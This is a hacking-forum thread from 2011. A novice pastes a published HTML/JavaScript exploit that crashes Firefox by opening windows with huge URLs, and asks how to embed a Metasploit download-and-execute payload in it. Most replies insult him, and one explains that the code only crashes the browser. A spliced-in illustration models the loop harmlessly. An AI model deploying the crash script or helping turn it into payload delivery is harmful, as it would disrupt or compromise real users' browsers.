| Author |
remote execution not working? |
dryheat360
Member
Posts: 3
Location:
Joined: 10.04.11 Rank: Newbie |
|
Hey guys. I've been browsing the site from time to time and I finally decided to join. I am really trying hard to escape the "skiddy" phase and actually do some real learning, and what better way to learn than through trial and error, right? Some other sites (which won't be named) pride themselves on the "Download Keyloggers" section, but don't have anything to actually learn from. Anyway, enough about that, onto the question:
So I've been messing with some code here that is supposed to allow remote execution of code through Firefox, based on what I'm told. The code effectively crashes my Firefox when I don't have my custom payload, but when I try to put my own thing inside, it still crashes and does not execute. I have just recently started playing with exploits so I am not too familiar with what I'm doing. Basically here is what's going on:
Got an exploit from injector. I was told this allows remote execution of code:
#==
# Title : Mozilla Firefox (all) Crash Handler Vulnerabilities
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Twitter : twitter.com/kedans
# platform : windows
# Impact : Crash Handler
# Tested on : Windows XP Sp3 FR & Linux Ubuntu 8.10 En ( Back-Track 4 'R1')
# Target : Mozilla Firefox (all)
# ** this Vulnerabilities is expectant in all Versions 2 etc ... 3.x **
#==
# Note : BAC 2011 Enchallah ( Me & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
###
# == HTML (1) ==>
<html>
<head>
<body onblockedload="javascblockedript:KeD();">
<scblockedript language="Javascblockedript">
function KeD()
{
var buffer = '\x42';
for(i=0; i <= 999 ; ++i)
buffer+=buffer+
window.open(buffer+buffer+buffer,width=-99,height=-99); // Open New Windows & Crash !!
}
</scblockedript>
</head>
</body>
</html>
# == HTML (2) ==>
<html>
<head>
<body onblockedload="javascblockedript:AnS();">
<scblockedript language="Javascblockedript">
function AnS()
{
var buffer = '\x42';
for(i=0; i <= 999 ; ++i)
buffer+=buffer+
window.open(buffer+buffer+buffer,fullscreen=true); // Open New Windows & Crash !!
}
</scblockedript>
</head>
</body>
</html>
#==[ Exploited By KedAns-Dz * HaCerS-StreeT-Team-Dz * ]==
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
# Islampard * Zaki.Eng * Dr.Ride * Red1One * Badr0 * XoreR * Nor0 FouinY * Hani * Mr.Dak007 * Fox-Dz
# Masimovic * TOnyXED * cr4wl3r (Inj3ct0r.com) * TeX (hotturks.org) * KelvinX (kelvinx.net) * Dos-Dz
# Nayla Festa * all (sec4ever.com) Members * PLATEN (Pentesters.ir) * Gamoscu (www.1923turk.com)
# Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{
# Indoushka (Inj3ct0r.com) * [ Ma3sTr0-Dz * MadjiX * BrOx-Dz * JaGo-Dz (sec4ever.com) ] * Dr.0rYX
# Cr3w-DZ * His0k4 * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} ,
# www.packetstormsecurity.org * exploit-db.com * bugsearch.net * 1337day.com * x000.com
# www.metasploit.com * www.securityreason.com * All Security and Exploits Webs ...
#==
# 1337day.com [2011-03-27]
First of all, do I choose either section of html, or do I use them both? I have tried many things to no avail. Anyways, where it says '\x42' I put my own payload that was generated through Metasploit. It looks like this:
and of course this is Ruby. This is a Windows payload download_exec. My problem here is that it doesn't run. I have tried making a message box pop up also without success.
I also found another exploit that specifically claims remote execution at:
http://www.1337day.com/exploits/14208
but I have no idea what to do with it. Where does the payload go?
I know I'm missing something here, but what? Any help is appreciated :D |
|
| Author |
RE: remote execution not working? |
xof
Member
Posts: 17
Location:
Joined: 27.02.10 Rank: Wiseman |
|
|
Go learn how to fucking program. |
|
| Author |
RE: remote execution not working? |
dryheat360
Member
Posts: 3
Location:
Joined: 10.04.11 Rank: Newbie |
|
|
xof wrote:
Go learn how to fucking program.
Another 16 year old acting hard with his keyboard. You're cool, bro.
Go Fuck yourself.
Anyone have anything constructive to say? |
|
| Author |
RE: remote execution not working? |
stealth-
Member

Posts: 999
Location: Eh?
Joined: 10.04.09 Rank: God |
|
dryheat360 wrote:
xof wrote:
Go learn how to fucking program.
Another 16 year old acting hard with his keyboard. You're cool, bro.
Go Fuck yourself.
Anyone have anything constructive to say?
No, he is serious. Just blunt. Allow me to elaborate:
You clearly do not have any understanding of how those exploits work. Not that it is a bad thing, but it just means that you aren't going to learn much from them this way. If you would really like to leave the script kiddie phase, then just randomly trying to run exploits is not the way to do it. You should have the programming knowledge of how these work before you go playing with them, otherwise they aren't going to be of any benefit to you knowledge-wise. We could spoon-feed you here and explain why what you're trying to do isn't what you think it is, but you wouldn't learn much. Honestly, programming knowledge is a must before you play with these.
Hope that clarifies.
The irony of man's condition is that the deepest need is to be free of the anxiety of death and annihilation; but it is life itself which awakens it, and so we must shrink from being fully alive.
http://www.stealth-x.com |
|
| Author |
RE: remote execution not working? |
dryheat360
Member
Posts: 3
Location:
Joined: 10.04.11 Rank: Newbie |
|
What you're saying totally makes sense. What I'm not 100% sure of is why this particular exploit didn't work. I mean the code seems simple enough, right?
I am in fact learning programming at the moment. In fact besides what I've learned and continue to learn on my own, I've signed up for classes. My train of thought here though was something along the lines of "what better way to learn than through trial and error right?"
Thanks for the response by the way. |
|
| Author |
RE: remote execution not working? |
xof
Member
Posts: 17
Location:
Joined: 27.02.10 Rank: Wiseman |
|
Why don't you just look at the code.
All it's doing is looping through 999 times and appending your 'payload' to the variable buffer each time. On each loop it will also open a window with an address of 'bufferbufferbuffer'. That's a really long address and pretty obvious as to why it's causing your browser to crash. How stupid are you? It says "Mozilla Firefox (all) Crash Handler Vulnerabilities" in the title of your exploit. It's supposed to crash.
You want to learn how to hax0r? Read up on assembly, how programming languages handle memory, compilers, and also some architecture stuff wouldn't be bad either.
Until then you can go fuck yourself you piece of shit skid. Kay bro? |
|
| Author |
RE: remote execution not working? |
suid
Member

Posts: 19
Location: /
Joined: 12.11.10 Rank: HBH Guru |
|
|
xof wrote:
All it's doing is looping through 999 times
That loop iterates 1000 times. Misreading numbers of iterations can lead to some nasty consequences.
I realize this is totally off-topic.
Edited by suid on 11-04-11 15:36 |
|
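Added illustration, not part of any post in this thread: a model of the loop discussed above that only tracks string lengths, so nothing is allocated and no window is opened. It follows the statement as it appears on the page (`buffer += buffer + window.open(buffer+buffer+buffer, ...)`); the function name `modelLoop`, the 2^30-character cap and the 15-character stringified return value of `window.open` are assumptions made for the example.

```javascript
// Length-only model of the posted loop. No strings are built and
// window.open is never called; only the sizes are computed.
// ASSUMPTION: the value returned by window.open stringifies to a fixed
// number of characters (15, as in "[object Window]"); the page does not say.
function modelLoop(seedLen, maxUrlChars, openResultLen = 15) {
  let len = BigInt(seedLen);        // length of `buffer` before the loop
  let iterations = 0;               // how many times the loop body runs
  let firstOverCap = null;          // first iteration whose URL exceeds the cap

  for (let i = 0; i <= 999; ++i) {  // same bounds as the posted loop
    iterations++;

    // window.open(buffer + buffer + buffer, ...): URL is three copies.
    const urlLen = 3n * len;
    if (firstOverCap === null && urlLen > BigInt(maxUrlChars)) {
      firstOverCap = { i, urlLen };
    }

    // buffer += buffer + <result of window.open>: the string doubles
    // (plus a constant) on every pass, whatever its contents are.
    len = len + len + BigInt(openResultLen);
  }

  return {
    iterations,
    firstOverCap,
    // Number of decimal digits in the final length, to show its scale.
    finalDigits: len.toString().length,
  };
}

// Constructed input: a 1-character seed (the '\x42' in the listing) and a
// cap of 2^30 characters chosen only to make the growth visible.
const result = modelLoop(1, 2 ** 30);
console.log(`loop body runs ${result.iterations} times`);
console.log(`URL passes 2^30 chars at i=${result.firstOverCap.i}`);
console.log(`final length would have ${result.finalDigits} decimal digits`);
```

The bytes placed in the seed only change the starting length; in this model they are never anything but characters of a string handed to `window.open`.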
| Author |
RE: remote execution not working? |
spyware
Member

Posts: 4190
Location: The Netherlands
Joined: 14.04.07 Rank: God Warn Level: 90
|
|
Not sure why people veered away from the whole bluntness thing.
Fuck off, OP.

"The chowner of property." - Zeph Widespread intellectual and moral docility may be convenient for leaders in the short term,
but it is suicidal for nations in the long term. - Carl Sagan Since the grid is inescapable, what were the earlier lasers about? Does the corridor have a sense of humor? - Ebert |
|
| Author |
RE: remote execution not working? |
Arabian
Member

Posts: 322
Location: inside you.
Joined: 22.09.10 Rank: God |
|
When I read this code, my brain is full of fuck.
Hare Lambda!
|
|
| Author |
RE: remote execution not working? |
korg
Admin from hell

Posts: 1704
Location: ENDING YOUR ONLINE EXPERIENCE!
Joined: 01.01.06 Rank: The Master |
|
That's about enough, I think the OP gets the idea now.
I deal in pain, All life I drain, I dominate, I seal your fate.
|
|